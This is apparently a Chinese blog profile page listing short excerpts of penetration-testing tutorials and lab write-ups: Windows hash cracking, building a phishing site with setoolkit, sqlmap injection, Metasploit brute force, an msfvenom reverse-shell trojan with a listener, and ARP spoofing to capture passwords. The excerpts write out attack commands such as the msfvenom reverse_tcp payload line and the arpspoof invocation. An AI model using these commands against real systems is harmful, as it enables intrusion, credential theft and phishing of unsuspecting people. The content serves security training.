- 博客(8)
- 问答 (1)
- 收藏
- 关注
原创 Windows操作系统渗透测试
点击Tables 选择free small 点击install 选择root 找到自己的123文件点击OK。另外开启一个命令行远程连接 rdesktop ip -u 用户名 -p 密码。将得到的管理员的hash值,导入到ophcrack(彩虹表)进行破解。5.将系统最高权限管理员账户的密码作为Flag值提交。点击Load 点击Single hash 粘贴哈希值。Show options(查看配置参数)map -sV -sS 靶机ip。设置完毕后退出,开启远程桌面命令。点击OK 后点击Crack进行破。
2023-03-27 15:20:15
617
原创 kali制作钓鱼网站
设置攻击方Kali Linux主机的网络连接模式为桥接模式,如下图所示。 步骤:选择设置/选择网络适配器/选择桥接模式/选择确定选择图形化界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。步骤:选择13-Social Engineering toolkit/选择social engineering toolkit工具/双击打开/初次进入需要输入y选择命令行界面打开工具setoolkit(钓鱼网站部署工具),如下图所示。 命令:setoolkit...
2021-12-27 18:31:51
6970
2
原创 kali基本常用命令
显示当前所在的路径 pwd进入某文件夹 cd 文件夹名kali桌面路径 /root/Desktop/ 桌面也是在某一个文件夹下返回上一级目录 cd+两个点 (cd与…之间有空格) cd / 则返回根目录新建文件 touch 文件名 touch a b 表示建立两个文件夹:a和b查看目录下的内容 ls 加 -l 参数可以显示内容详细信息新建文件夹 ...
2021-12-27 18:25:05
8207
原创 web渗透测测试(sqlmap)
通过分析靶机JLS02页面信息,寻找漏洞页面,将WEB服务存在SQL注入漏洞的页面名称作为Flag提交 Flag:index2.php通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用来存放WEB服务的数据库名称作为FLAG提交先随便输入点什么 sqlmap这个地址sqlmap使用注入语句结果如下flag:webiu3. 通过本地PC中的渗透测试平台KALI2020对靶机进行SQL注入攻击,获取靶机的数据库信息,将用...
2021-12-24 07:57:04
3416
1
原创 Linux系统提权渗透测试
通过渗透测试平台对服务器场景CentOS5.5,使用nmap进行服务扫描渗透测试,并将扫描结果上数第6行的4个单词作为Flag(形式:单词1|单词2|单词3|单词4)提交Nmap -sV 扫描靶机服务Nmap -sV 扫描靶机服务Flag:PORT|STATE|SERVICE|VERSION通过渗透测试平台对服务器场景CentOS5.5,使用metaspolit进行远程超级管理员口令暴力破解(使用的渗透测试平台中的字典文件superdic.txt),并将破解结果Success:后面2个空
2021-12-22 12:47:12
1981
原创 Sql注入点攻击
访问WebServ2003服务器场景,"/"->" Display Uploaded's File Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;访问后利用万能用户名进入场景进入后查看网页源代码查看变量名Flag:name="filename"对该任务第一题页面注入点进行渗透测试,通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ
2021-12-22 12:41:33
1194
4
原创 Metasploit(msf)木马生成
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe2 ls 查看是否创建出了该文件3 然后进入msfconsole进行监听4 use exploit/multi/handler 进入监听模式5 set PAYLOADset LHOST攻击机ipset LPORT 配置参数6 run 运行7 把刚...
2021-11-04 07:38:39
373
原创 欺骗攻击(密码劫持)
需要知道目标IP,目标网关,本机网卡,本机IP打开kali终端输入命令:echo1 >/proc/sys/net/ipv4/ip_forward使目标不断网cat /proc/sys/net/ipv4/ip_forward检查上述命令是否被执行,若返回1则说明已被执行arpspoof -i 本机网卡 -t 目标IP目标网关在本列中命令为:arpspoof -i eth0 -t 192.168.0.120 192.168.0.1另一个终端用来接收劫持(盗取的信息)
2021-11-04 07:29:06
305
空空如也
kali渗透远程连接
2021-12-15
TA创建的收藏夹 TA关注的收藏夹
TA关注的人